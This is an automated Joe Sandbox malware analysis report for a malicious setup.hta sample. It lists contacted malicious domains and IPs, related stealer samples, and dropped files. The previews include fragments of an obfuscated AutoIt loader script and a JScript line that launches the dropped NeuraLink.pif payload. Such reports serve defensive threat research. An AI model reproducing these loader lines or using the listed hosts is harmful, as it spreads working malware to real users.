https://go.micro	powershell.exe, 00000002.00000002.2166561428.00000000058B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://2no.co/2ZrVm4;Set-ItemProperty	powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/X	ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/autoit3/	ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://2no.co/2ZrVm4hn	powershell.exe, 00000004.00000002.2120550073.000000000799B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	powershell.exe, 00000004.00000002.2120550073.0000000007969000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.2166561428.0000000005091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2106290397.0000000004F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2189639078.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://whitemansearch.shop	powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2166561428.0000000005091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2106290397.0000000004F61000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
5.101.153.86	whitemansearch.shop	Russian Federation	198610	BEGET-ASRU	false
142.250.64.99	unknown	United States	15169	GOOGLEUS	false
142.250.64.78	unknown	United States	15169	GOOGLEUS	false
104.21.79.229	2no.co	United States	13335	CLOUDFLARENETUS	false
142.250.65.228	www.google.com	United States	15169	GOOGLEUS	false
142.251.40.100	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.251.40.174	clients.l.google.com	United States	15169	GOOGLEUS	false
142.251.163.84	accounts.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1395895
Start date and time:	2024-02-21 08:13:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	setup.hta
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winHTA@49/50@11/10
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 100% Number of executed functions: 117 Number of non-executed functions: 46
Cookbook Comments:	Found application associated with file extension: .hta Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.72.99, 34.104.35.123, 142.250.65.195, 142.250.80.42, 142.251.40.234, 142.251.40.202, 142.250.80.106, 142.250.80.74, 142.251.40.170, 142.250.72.106, 142.251.40.138, 142.250.65.202, 142.251.40.106, 142.251.35.170, 142.251.41.10, 142.250.176.202, 142.250.65.170, 142.250.81.234, 142.250.65.234, 142.251.40.99, 142.250.80.99, 72.21.81.240, 192.229.211.108, 104.117.182.82
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 5444 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 4408 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4820 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:14:00	API Interceptor	1x Sleep call for process: mshta.exe modified
08:14:01	API Interceptor	77x Sleep call for process: powershell.exe modified
08:14:43	API Interceptor	4x Sleep call for process: Identification.pif modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.79.229	setup.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	Blog.zip	Get hash	malicious	RHADAMANTHYS	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader, Socks5Systemz	Browse
	rlRiFBcuVa.exe	Get hash	malicious	RedLine, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse
239.255.255.250	https://d15k2d11r6t6rl.cloudfront.net/public/users/Integrators/9b6602e0-8330-4551-8b9a-4eb63bbbc1b7/test-bee-id/r_3.shtml	Get hash	malicious	Phisher	Browse
	https://filezilla-project.org/download.php?type=client	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.19912.30037.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse
	http://wgmainpage.net/	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.21247.5426.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse
	http://monuadz.com	Get hash	malicious	Unknown	Browse
	http://adobesign.github.io/?u=YW50aGVhLmthcmFsaXNAbWxjaW5zdXJhbmNlLmNvbS5hdQ==	Get hash	malicious	HTMLPhisher	Browse
	zVoxvQ1aiC.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse
	http://dbsguru.com	Get hash	malicious	Unknown	Browse
	S8asBCa2u0.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse
5.101.153.86	setup.lnk	Get hash	malicious	RHADAMANTHYS	Browse	whitemansearch.shop/ClassroomEc.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
2no.co	setup.lnk	Get hash	malicious	RHADAMANTHYS	Browse	104.21.79.229
	Blog.zip	Get hash	malicious	RHADAMANTHYS	Browse	104.21.79.229
	qG2cUr0x4A.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse	172.67.149.76
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	104.21.79.229
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	172.67.149.76
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	104.21.79.229
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	172.67.149.76
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	104.21.79.229
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	172.67.149.76
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse	172.67.149.76
whitemansearch.shop	setup.lnk	Get hash	malicious	RHADAMANTHYS	Browse	5.101.153.86

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	NEW ORDER.doc	Get hash	malicious	Nanocore, PureLog Stealer	Browse	104.21.21.189
	Order -SA95648.doc	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.188.40
	file-004331_pdf.gz.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.21.70.192
	https://d15k2d11r6t6rl.cloudfront.net/public/users/Integrators/9b6602e0-8330-4551-8b9a-4eb63bbbc1b7/test-bee-id/r_3.shtml	Get hash	malicious	Phisher	Browse	104.21.15.236
	Purchase order.xls	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	https://filezilla-project.org/download.php?type=client	Get hash	malicious	Unknown	Browse	172.67.71.97
	SecuriteInfo.com.Win32.TrojanX-gen.19912.30037.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	172.64.41.3
	SALES CONTRACT.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	9kFZ5fhiLu.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc	Browse	104.21.94.2
	http://wgmainpage.net/	Get hash	malicious	Unknown	Browse	104.17.2.184
BEGET-ASRU	setup.lnk	Get hash	malicious	RHADAMANTHYS	Browse	5.101.153.86
	FedEx_AWB#53053752046.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	45.130.41.51
	https://csxsteam.com/	Get hash	malicious	Unknown	Browse	45.130.41.12
	oi30i8r35W.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	5.101.152.58
	pXVVl7pMmy.exe	Get hash	malicious	DCRat	Browse	5.101.152.58
	DHL_AWB#6209811980.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	45.130.41.51
	DE6roRnbWj.exe	Get hash	malicious	Unknown	Browse	45.147.176.145
	DE6roRnbWj.exe	Get hash	malicious	Unknown	Browse	45.147.176.145
	mwcPF1EpU6.exe	Get hash	malicious	DCRat	Browse	5.101.153.86
	a5ZFXj0x18.exe	Get hash	malicious	Unknown	Browse	45.147.176.145

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	https://d15k2d11r6t6rl.cloudfront.net/public/users/Integrators/9b6602e0-8330-4551-8b9a-4eb63bbbc1b7/test-bee-id/r_3.shtml	Get hash	malicious	Phisher	Browse	23.1.237.91
	Payment Advise Swift-107423214.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.1.237.91
	http://adobesign.github.io/?u=YW50aGVhLmthcmFsaXNAbWxjaW5zdXJhbmNlLmNvbS5hdQ==	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	https://ir.shareaholic.com/e?a=1&u=https://imt.foundation/rgrandQ3El-Qsrg-ll8Kv-d58Kvo-y5%3Futm_campaign%3Dshareaholic%26utm_medium%3Dtwitter%26utm_source%3Dsocialnetwork&r=1	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	https://www.compu-needs.com/app/	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://aracelyjohnston.autos/rebalancing/spoke/?box=violet	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://brendenpayne.autos/rebalancing/spoke/?box=violet	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://midsoccnidnjkids-9393939.weeblysite.com/	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://wgmainpage.net/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	23.1.237.91
	https://manik4.shop/pop/pop/?tk=cynal2j7p5gogrb08ps9qqitmalhhbzz	Get hash	malicious	TechSupportScam	Browse	23.1.237.91
28a2c9bd18a11de089ef85a160da29e4	https://d15k2d11r6t6rl.cloudfront.net/public/users/Integrators/9b6602e0-8330-4551-8b9a-4eb63bbbc1b7/test-bee-id/r_3.shtml	Get hash	malicious	Phisher	Browse	13.85.23.86 23.51.58.94
	https://filezilla-project.org/download.php?type=client	Get hash	malicious	Unknown	Browse	13.85.23.86 23.51.58.94
	http://adobesign.github.io/?u=YW50aGVhLmthcmFsaXNAbWxjaW5zdXJhbmNlLmNvbS5hdQ==	Get hash	malicious	HTMLPhisher	Browse	13.85.23.86 23.51.58.94
	http://dbsguru.com	Get hash	malicious	Unknown	Browse	13.85.23.86 23.51.58.94
	https://padlet.com/amratef/new-project-proposal-document-a022xmsvsuf5x4fk	Get hash	malicious	Unknown	Browse	13.85.23.86 23.51.58.94
	https://ir.shareaholic.com/e?a=1&u=https://imt.foundation/rgrandQ3El-Qsrg-ll8Kv-d58Kvo-y5%3Futm_campaign%3Dshareaholic%26utm_medium%3Dtwitter%26utm_source%3Dsocialnetwork&r=1	Get hash	malicious	HTMLPhisher	Browse	13.85.23.86 23.51.58.94
	https://pocloudcentral.crm.powerobjects.net/PowerEmailWebsite//GetUrl2013.aspx?t=TEka9Gzp+UWz6rVgaDAhSUMAUgBNAA==&eId=03e02621-4ddf-eb11-8150-00155d010e03&pval=//fwdptwl%E3%80%82com/#SPSRwA5J3Bh8iBqWlcnM??kypxg44fhlrkaixdobr=Z29vZ2xlLmNvbQ==/..=%5BUNIQID%5D&u=276b8dda4ef94158348d5b6b8&id=6b7205781d	Get hash	malicious	Unknown	Browse	13.85.23.86 23.51.58.94
	http://surecoinpay.com/payment/	Get hash	malicious	Unknown	Browse	13.85.23.86 23.51.58.94
	https://idofea.org/a/baw/commmande/maxpro/info.php	Get hash	malicious	Unknown	Browse	13.85.23.86 23.51.58.94
	https://pnl.xfi.mybluehost.me/wp-content/art/nlDHLlocaPInour/MTTRBDFH/index.php?FGDD=1	Get hash	malicious	Unknown	Browse	13.85.23.86 23.51.58.94

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pif	SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe	Get hash	malicious	Bunny Loader	Browse
	ClassroomEc.exe	Get hash	malicious	RHADAMANTHYS	Browse
	setup.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	SecuriteInfo.com.Win32.BackdoorX-gen.25314.22004.exe	Get hash	malicious	Unknown	Browse
	oX9j1y0RV5.exe	Get hash	malicious	SmokeLoader, Vidar	Browse
	p2xoB50aKi.exe	Get hash	malicious	SmokeLoader, Vidar	Browse
	iZ7kyxHDY2.exe	Get hash	malicious	SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	RHADAMANTHYS	Browse
	file.exe	Get hash	malicious	Stealc	Browse
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe	Get hash	malicious	Bunny Loader	Browse
	ClassroomEc.exe	Get hash	malicious	RHADAMANTHYS	Browse
	setup.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	SecuriteInfo.com.Win32.BackdoorX-gen.25314.22004.exe	Get hash	malicious	Unknown	Browse
	oX9j1y0RV5.exe	Get hash	malicious	SmokeLoader, Vidar	Browse
	p2xoB50aKi.exe	Get hash	malicious	SmokeLoader, Vidar	Browse
	iZ7kyxHDY2.exe	Get hash	malicious	SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	RHADAMANTHYS	Browse
	file.exe	Get hash	malicious	Stealc	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2452
Entropy (8bit):	5.392527733303802
Encrypted:	false
SSDEEP:	48:/khWSU4y4RQmFoUeWmfgZ9tlNWR83ts0ZXjvxs8MKgeC/a3RR7KQR:mLHyIFKL3IZXW8mSXjZs8tgsBR9
MD5:	E999C100E789646E5D5258E8151B81DB
SHA1:	AC1EDA050B8D9B0A3C738E3172EDCA058E75FCB2
SHA-256:	B043E94E1BE13EF186D79EFE554132A9BC3FFF6CBC2B2CA17E7EFF074354A0CE
SHA-512:	FFF8F9BB08060B938D8F5C9F282358B3365210BCBAEA5436E3A7A61D9ECAB558A6E211A5FFC263239C275883081FA6262BD48581FF2CBAD64D3982E225EAC3A3
Malicious:	false
Preview:	@...e...........................................................P................1]...E.....~.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllullkv/tz:NllU+v/
MD5:	6442F277E58B3984BA5EEE0C15C0C6AD
SHA1:	5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256:	36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512:	F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\NeuraConnect Technologies\B

Download File

Process:	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif
File Type:	ASCII text, with very long lines (2633), with CRLF line terminators
Category:	dropped
Size (bytes):	1213985
Entropy (8bit):	5.424802222912315
Encrypted:	false
SSDEEP:	12288:A96a/UwPRU7iuldXPKzUq0T1Ozd5Ux9BHtV7NdJK8crvosLhjNh4PfAv:pa/UwPRUvldXil01OAJHX/JK1LhB
MD5:	2755A48352BA322E4FB289CC432C2882
SHA1:	4F88077F28D532C45CFEC6A8320BCA36FCEBB773
SHA-256:	6718CA85EE272C4251160CB301D3D5C17A78864EB8DB7100F418A72D053F7A4B
SHA-512:	2D04052FA6582C48F17247A27E227253E4F8669421A1A1C086D4AAE267647B0402F8976C238E7390A9DBE42F15481E4714F3D34F88A9F00A5D77F096FA747737
Malicious:	false
Preview:	Func CryChambers($EXPENSECARRYING)..$experiencesboulderpara = 588..$WellingtonNelsonDisks = 93..While 927..If $experiencesboulderpara = 586 Then..$AccordanceProceedingsFatIntend = 'restorationgrastaobservedrecipientusesmentordozenclosedelectricitysynopsistransmitted'..ObjGet(restorationml("76U81U79U77U91U92U51U80U93U90U92U51U85U81U86U51",56/7))..$CarriedReform = 'PATMORTGAGESCOCKSGENETICSBOBBYNATURALBROWSERFACTMOTHERBOARDCAFELADDERINFLUENCED'..IsDeclared(restorationml("85U70U68U73U79U74U82U86U70U84U65",5/5))..$brochurewelsh = 'onsrepositorydiscussionsromance'..Ceiling(3634)..$AttributesProjectedRetrieved = 'BOUGHTNEIGHBORSSHAMECONSTRAINTSMAMBOCOMMEUROLAYOUTATTORNEYS'..Chr(6319)..$experiencesboulderpara = $experiencesboulderpara + 1..EndIf..If $experiencesboulderpara = 587 Then..$atmosphericfeweralbany = 'DANNYNUDEEXTERIORRESIDENCEMEDICATIONDFGARLICHOSPITALITYPERFORMINGDEALTIMESPEAKINGDISCRIMINATIONCUSTOMSTAGGED'..IsDeclared(restorationml("78U104U108U94U82U101U115U112U111U110U115U105U98

C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	189
Entropy (8bit):	4.703486562755669
Encrypted:	false
SSDEEP:	3:RiMIpGXfeNH5E5wWAX+aJp6/h4EkD5r1XPuRLjNe+KJKOaDZc5uWAX+aJp6/h4Ei:RiJbNHCwWDaJ0/hJkD1dPuNjN3xOaDZf
MD5:	3E4E334322172D5B27D8E78430CB385D
SHA1:	7C35364C19D0513FD4EE7CB340BFD366828E7D61
SHA-256:	24A6DBC9AB9DBDBD44E20E2433A681CF9970D087C4F00659EB60E6396FBF06EA
SHA-512:	EDD965198E30A35A5FB8D40FB2FFA34FD43C2F457B80391372E485AF76B665B2FF22B01D997120530E3DFC3F0BFF03F940B76711099A63286A7D2543A712CFF3
Malicious:	false
Preview:	new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\NeuraConnect Technologies\\NeuraLink.pif\" \"C:\\Users\\user\\AppData\\Local\\NeuraConnect Technologies\\B\"")

C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pif

Download File

Process:	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	946784
Entropy (8bit):	6.628560786473655
Encrypted:	false
SSDEEP:	24576:LOo8pEnK4mrqlEZuVZ2HOI+X0l1lMZyYFaeBmyF:LF8p4KpqlEZeXI+X0TVcae3F
MD5:	848164D084384C49937F99D5B894253E
SHA1:	3055EF803EEEC4F175EBF120F94125717EE12444
SHA-256:	F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
SHA-512:	AABE1CF076F48F32542F49A92E4CA9F054B31D5A9949119991B897B9489FE775D8009896408BA49AC43EC431C87C0D385DAEAD9DBBDE7EF6309B0C97BBAF852A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 4%, Browse
Joe Sandbox View:	Filename: SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe, Detection: malicious, Browse Filename: ClassroomEc.exe, Detection: malicious, Browse Filename: setup.lnk, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.BackdoorX-gen.25314.22004.exe, Detection: malicious, Browse Filename: oX9j1y0RV5.exe, Detection: malicious, Browse Filename: p2xoB50aKi.exe, Detection: malicious, Browse Filename: iZ7kyxHDY2.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...\|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	946784
Entropy (8bit):	6.628560786473655
Encrypted:	false
SSDEEP:	24576:LOo8pEnK4mrqlEZuVZ2HOI+X0l1lMZyYFaeBmyF:LF8p4KpqlEZeXI+X0TVcae3F
MD5:	848164D084384C49937F99D5B894253E
SHA1:	3055EF803EEEC4F175EBF120F94125717EE12444
SHA-256:	F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
SHA-512:	AABE1CF076F48F32542F49A92E4CA9F054B31D5A9949119991B897B9489FE775D8009896408BA49AC43EC431C87C0D385DAEAD9DBBDE7EF6309B0C97BBAF852A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 4%, Browse
Joe Sandbox View:	Filename: SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe, Detection: malicious, Browse Filename: ClassroomEc.exe, Detection: malicious, Browse Filename: setup.lnk, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.BackdoorX-gen.25314.22004.exe, Detection: malicious, Browse Filename: oX9j1y0RV5.exe, Detection: malicious, Browse Filename: p2xoB50aKi.exe, Detection: malicious, Browse Filename: iZ7kyxHDY2.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...\|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\m

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (2633), with CRLF line terminators
Category:	dropped
Size (bytes):	1213985
Entropy (8bit):	5.424802222912315
Encrypted:	false
SSDEEP:	12288:A96a/UwPRU7iuldXPKzUq0T1Ozd5Ux9BHtV7NdJK8crvosLhjNh4PfAv:pa/UwPRUvldXil01OAJHX/JK1LhB
MD5:	2755A48352BA322E4FB289CC432C2882
SHA1:	4F88077F28D532C45CFEC6A8320BCA36FCEBB773
SHA-256:	6718CA85EE272C4251160CB301D3D5C17A78864EB8DB7100F418A72D053F7A4B
SHA-512:	2D04052FA6582C48F17247A27E227253E4F8669421A1A1C086D4AAE267647B0402F8976C238E7390A9DBE42F15481E4714F3D34F88A9F00A5D77F096FA747737
Malicious:	false
Preview:	Func CryChambers($EXPENSECARRYING)..$experiencesboulderpara = 588..$WellingtonNelsonDisks = 93..While 927..If $experiencesboulderpara = 586 Then..$AccordanceProceedingsFatIntend = 'restorationgrastaobservedrecipientusesmentordozenclosedelectricitysynopsistransmitted'..ObjGet(restorationml("76U81U79U77U91U92U51U80U93U90U92U51U85U81U86U51",56/7))..$CarriedReform = 'PATMORTGAGESCOCKSGENETICSBOBBYNATURALBROWSERFACTMOTHERBOARDCAFELADDERINFLUENCED'..IsDeclared(restorationml("85U70U68U73U79U74U82U86U70U84U65",5/5))..$brochurewelsh = 'onsrepositorydiscussionsromance'..Ceiling(3634)..$AttributesProjectedRetrieved = 'BOUGHTNEIGHBORSSHAMECONSTRAINTSMAMBOCOMMEUROLAYOUTATTORNEYS'..Chr(6319)..$experiencesboulderpara = $experiencesboulderpara + 1..EndIf..If $experiencesboulderpara = 587 Then..$atmosphericfeweralbany = 'DANNYNUDEEXTERIORRESIDENCEMEDICATIONDFGARLICHOSPITALITYPERFORMINGDEALTIMESPEAKINGDISCRIMINATIONCUSTOMSTAGGED'..IsDeclared(restorationml("78U104U108U94U82U101U115U112U111U110U115U105U98

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ada

Download File

Process:	C:\Users\user\AppData\Roaming\ClassroomEc.exe
File Type:	data
Category:	dropped
Size (bytes):	264192
Entropy (8bit):	6.281778420980018
Encrypted:	false
SSDEEP:	6144:uHFq9O0lHPOGUWLhxjRYmFqZvEAOz04pmdV:w0lHPOGNnlMZce4wdV
MD5:	02785C43A2C040A23250A393BD31F65E
SHA1:	DD1EAC34B995DB3E9042AD3C4CC976A1B269694A
SHA-256:	C5F80C51A6BFC433A4CDA5F1F786F96156E4E8ECE8C6D09FAF147C38E6C363EC
SHA-512:	D492C28CEBA9BADF6A1CC89CFBF65EE256606B20890C1536B03832BCC72724DE97B179CFC97F39D9482CB2E24D966610CA8A082CBFE4E76B0D9792BFDF6EC113
Malicious:	false
